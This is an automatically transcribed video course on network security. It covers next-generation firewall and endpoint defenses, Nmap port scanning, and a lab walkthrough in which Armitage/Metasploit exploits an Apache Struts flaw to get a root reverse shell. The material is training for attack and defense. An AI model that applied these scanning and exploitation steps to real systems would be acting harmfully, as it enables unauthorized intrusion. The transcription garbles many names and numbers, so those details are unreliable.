24. Threat Defense & Endpoint Security
In five five A we have threat difference and five B we have endpoint security. So what I’m going to do that in upcoming four sessions you’ll find that we’ll go and learn about that. How you can do the hacking means how we can get some more privilege and then you can attack certain endpoints with help of semitas ployed, that is again the hacking tool. With that you can go and gain access and then you will see the attack side, and then you will see the different side as well. That with help of say for example firepower, how you can go to protect as well. So we have two examples related to the attack and the difference and one session is there related to Porter scanning.
Because nowadays you have so many tools that you can use even if you don’t know much about the hacking and don’t know much about the security breach, somehow you can download from somewhere. And if you are not using corporate laptop and then your non corporate laptop, you’re connecting to the corporate network while doing work from home or while working from remote location, there may be some security breaches that we are doing unwantedly unknowingly. So before doing the lab, let’s quickly go through and check that what is the lab setup and what type of defense mechanism we have. So with respect to FTT, again, this is the topic that will come into five three.
You can see here that we can go and analyze the signature. With respect to next generation IPS, we have the full visibility, the flow of traffic. Now the question is that why we have full visibility? We have full visibility because my firewall, my devices, they can recognize the application. So one popular term is the ABC application visibility control. So whenever packet is going via the firewall or the perimeter firewall, at that time they are intelligent enough to learn the metadata of that application. And according to that, or we can put the rule on that. So not only that the next generation firewalls or the latest firewalls, nowadays we’re not telling them firewall, but we are telling them security appliances.
So these security appliances not only can do the firewalling stuff like blocking and allowing the port and certain applications, but they can mix with the IPS devices. So we don’t need to insert separate module for IPS ideas in build, they can have that feature. They have full app visibility and control. Say for example, high ability we are putting when you have two devices in active passive, so if one is crashed, the other will become active. That’s for redundancy and high ability. But now all these modern security appliances, we have the capability to do the analytics and automation. It can be integrated with thread grid, it can be integrated with amp cloud as well.
So those integrations are there, we can go there and do the URL filtering or web filtering. This can be integrated with the Ice and we have the integration with respect to Pixie grid. So you can go and integrate your security devices or maybe other devices with Ice as well that will provide you the contextual information and according to that you can take decision. Again, one term related to Ice is profiling. So we have the profiling options as well. Now, in the next section, I told you that in the next four section we are going to do the attack to a network and then we’ll gain the access and we’ll see that how the defense mechanisms in the form of amp, in the form of firepower, in the form of ice, in form of email security, web security, etc, etc. Just so whatever layer of security we have, how they will go and protect, although in upcoming example when we do the attack we will mitigate via the next generation firewall, obviously next generation firewall, not only we have the firewall link capability but we can have this Ipsids and other URL filtering as well.
Now when we are talking about endpoint so here you can see that we have amp for endpoint and that’s actually very powerful. So we have advanced malware protection at the end point. At the moment the malware will come and hit the end point and that’s the last line of defense. Correct? Someone has breaches all the security layers and then he reached to the last mile or last line, but still at the last mile we have the amp advanced malware protection. Somehow it is connected to the cloud amp and from there it is getting all the updates so it will provide the security. Cisco any connect VPN is also a powerful client full agent that will be installed in the laptop to do the connection, to do the actual remote access VPN connection with the firewall or any type of server.
Correct? So these are the endpoints related terms we have seen about Cisco umbrella as well. That how it is providing first layer or first line of defense. So whenever any traffic is coming from outside, I have this Cisco umbrella layer and it has so many capabilities, that means it can do cloudbased firewall, it can do some sort of URL filtering, it can do proxy, there are so many features in built inside Cisco umbrella that will provide your first line of defense. Again, Cisco has different, we can see the tire of different vendors or Cisco is supporting some thirdparty vendors as well for the application visibility and the analytic. So those options are also there in terms of security. So let’s stop here and you can refer this topology as well for the upcoming sessions. So let’s stop and check the upcoming four labrelated videos.
25. Reconnaissance using NMAP
Let us do reconnaissance using Nmap network map. This is one of the most popular tool amongst all the network professionals, not only to do the hacking or Nt hacking, but to do some sort of auditing and some sort of penetration testing. Nmap is used. Now, the use of Nmap is very easy, it’s very easily we can use it. It’s simply that various scans that we can perform with respect to host discovery, port scanning, version detection, OS detection is scriptable interaction with the target. These options we have, but the overall configuration or overall the CLI command to achieve these targets are actually very straightforward all the time. You can go and visit to these sites. So one of the Nmap. org book man port scanning techniques, the other one is the cheat sheet.
Also you can refer, you will get two page cheat sheets from where you can take the references as well. Let me show you the website. If you go there, you will get very sweet and nice description of this particular Nmap capabilities. Then we have a small strings, say N map, and then SS. This is for TCP scene scan, then for TCP connector scan, UDP scans, then init, then other strings as well. So have a look on this particular site. Today we had to do some of the scanning. So I will show you, that how we can do few of the scannings, but it’s open, you can go and take the reference as well. Coming back to our slide, once we’ll do the scan, then in the next section, in next recording, I’m going to introduce the Rapid Seven next pose vulnerability tool. From there we’ll get a list of vulnerability to that specific server or to that specific target. So before doing that, let us go and do this N map scan.
At the moment we know what is my target. So here we can see that with respect to target, I can do TCP scan, I can do UDP scans, I can do some selective port scans, I can check which are the host, which is live. So all these things we have. So let me go log to my Linux Kali server, from there I can use the Nmap. Okay, so let’s do it. All right, so what we have to do, first of all you have to do, or you have to type the keyword N map, and then what you want to scan. So I want to do some TCP scan. I can give the st as a string and then I have this target, so I know this is my target, although you see that it’s very fast, so I can come to know that, okay, these ports are open port two 2813-944-5808 to this particular target. Suppose if I want to see that, what is the overall subnets I have, or what is the overall IP in a particular subnet I have, so I can go and give that subnet, say 24 to that specific target. Now it is started scanning. We’ll wait for the result. And here we have the summary. So it has a scan total 256. Now suppose I don’t want to scan up to 256, I want to scan few of them. For example. So here you can see it has a scan view of them as well. 16 host and if it will get any response, then it will tell you, okay, 25 is this ad MDS then 28.
So here you can see initially also we have figured out 25 and 28. Let us do one of the UDP scan. So how we can do you have to give this thing, say N map and then if you want you can give S capital U. If you want to select some ports, you can give the port number. Say one, two, three is for NTP then one six one and one six two actually is for SNMP. If you want you can give the IP as well. So 20 dot for example five. Let’s see, all these ports are closed with respect to 25. Okay. So these are the things that we can go and do the scannings. Let me show you that how you can give a specific port support is et with respect to the same target that is 25 is open. If I check some other target, that is 28, that is also open.
Let me show you that how you can give the range of the ports. So I can give port. I want to check UDP port, say 53, four DNS 137. And then I want to give some TCP ports. So I can give a TCP for example 21 to 25. Then I can give say 84 for three. And then I can give the IP what is the target IP 25. Now you can see I am now selective with the ports and I am getting the result in this format. So some ports are open, some ports are closed, like that I am getting the result and I simply want to check my UDP port. Why? Let’s see, let me go here nmap done scan. Okay, so this is the way that actually can do the manipulation while you are scanning the target. If you are interested to scan UDP port or you are interested to scan the TCP ports.
26. Attack Public Network via Front Door
Now we are all set to attack the target. So what we have done so far we have done port scanning, we come to know what are the open ports. Then with help of metasploit we’ll come to know that what is the vulnerability. Now we are going to exploit that and we’ll get some root access with help of that exploit. That is the overall goal of this particular section. So what are the things we have in our lab? First of all we’ll try to attack and once we are successfully attacked to that particular server, in the next section with help of Cisco Firepower, with help of IPS rules, we’ll try to mitigate. Okay, so let us attack and you can see here our resources. We have Kali Linux, that includes Meta spot, that will be the default. We have attacker resource, that is we have done the vulnerability assessment with help of next post we have an attack target as well.
Then from the defense side we’ll see that we have FMC as a centralized console management and we have sensors like FTD. Okay, so we are going to use all these attack and defense tools one by one. First of all, let us attack. So for this I’m going to use army tag as an attacker. So with help of this particular application inside Metasploit, I’m going to do the attack, I will show you all the steps, that how you can launch the army tag and then you can do the attack. Although if you want all the step by step configuration and options, you can see here the same thing I’m going to show you with help of our Kali Linux metasploit. So let us log I am inside my Kali Linux. The first thing that we should do inside Linux is to check that your metasploit is running or not. So we can check the initialization of that and that should be Msfdb. So let me correct that little quick and we’ll wait.
So once I get the confirmation that it is started and it’s already configured, then I’ll go and start my army tag. Let’s start this. So simply you have to go and type the keyword army tag then it will pop up. Let’s see. So here you can see that yes, I want to connect user is MSF and let’s connect it. Yes. So all these things you need to read and choose either yes or no. So yes, I want this Metasploit RPC server to be connected, let’s just connect that. We have some legal warnings, we will check that illegal access, one enable warnings, all these things. Now we have new window and here in the bottom you can see that we have this CLI as well. Now we want to exploit obviously. So what I’ll do, I’ll go here and check inside this exploit because I’m very much looking for the struts.
So what strut we have here you can see that I have so many but I’m looking for struts content type two. And if I double click this here, you can see the detail description of this strut plus what is the source, what is the destination? If you click the plus sign here, it will tell you that. Okay. What is the remote port, what is the target Uri? What is the local host? All this information. Okay. Yes. I want to use a reverse connection. That’s important. And before launching this, let me close here. Let me go back to the CLI. Because I just wanted to show you some other aspects as well. So here we can go and you can see that what is the source script you’re running. So let me show you that. Let me open yeah, so let’s open this. If I go to my root folder, let me go to the root folder and inside the root folder, let me show you the program that we are running.
So here you can see that I have program. And what is the program that I want to show you? Let me open that program as well. So if I do module four RC Here it is. So here they use the exploit that we are going to do. The exploit, the payload, the remote host that we know.
What is the target, what is the remote port, what is the target Uri I’m going to use and then the local host as a C to attack. Then the local port. So this is set. Actually, that where I’m going to attack. Let me go back one more time. Let me start armitage one more time and then we will do the attack. So although you can see that the steps that we are using here in our lab, that’s a similar type of steps or similar type of pattern that a hacker also can do. And they are using the similar type of pattern. Like, first of all, do the reconnaissance test where you will find that what is the target server, target ports. Once you know that open ports, then you check for running applications.
Once you know those application, then you go and check what are the vulnerabilities inside those applications. Once you know the vulnerabilities, then you have to write a code. Suppose the code is available, then it’s good. Otherwise you have to write the code. Once you write the code, then the next step is from your source to the destination. You have to create a connection. Because by the end of day you want the access. You want to access those servers. So I’m going to use the reverse connection and launch. Once we do that, we’ll see that how it will work. So here you can see the console is there and the exploit is there. So payload, the set, remote port, SSL files unknown variable. This is trying okay, it’s tried to do all the things to connect that exploit.
Failed. The following option failed to validate our host complete. But no, she hasn’t created. So here we see that okay, our attack has been failed and then we need to set the correct variable. So why it is the following options fail to validate it is failing to validate the remote host. As we see that our first time attack is failed. And if I go and check the model so here you can see that the remote host instead of DNS I have given say the IP address remote port I have given ETI. Although we know that what are the ports are open, what is the target URL? That’s very important. See client portal file upload upload action. So I need to check this as well. I need to check where I am going to do this attack. So all these parameters should match inside army catch. So let me open one more time and let’s do it now it is opening. Let’s wait till it opens. Yes, it opens. So inside exploit what I will do, I’ll go and search the vulnerability. Double click that. Now here you can see in the remote host there is nothing.
So what I’ll do, I will put the correct destination that is 25. Then here I will give the port number as 80. 80. And what is the target? Uri. So let me correct that as well that Uri is client portalfile upload and then upload action. Okay. All right. So we are very much good up to this point. I will use the reverse connection and launch. Let’s say that this time we got success or not. Say if the attack is successful, what you will find that this will change the color and it will show you that it has been compromised. Here you can see that I can go right click sell interact then the cell one will open. If I type who is the say who am I? A little bit of lines linux things will help here LS minus la what is the present working director. So you can see that now I am root and now I can do anything. So part by part you can see that how we exploited that how we check the vulnerability, how I’ve done the ports can and now I am inside the server.
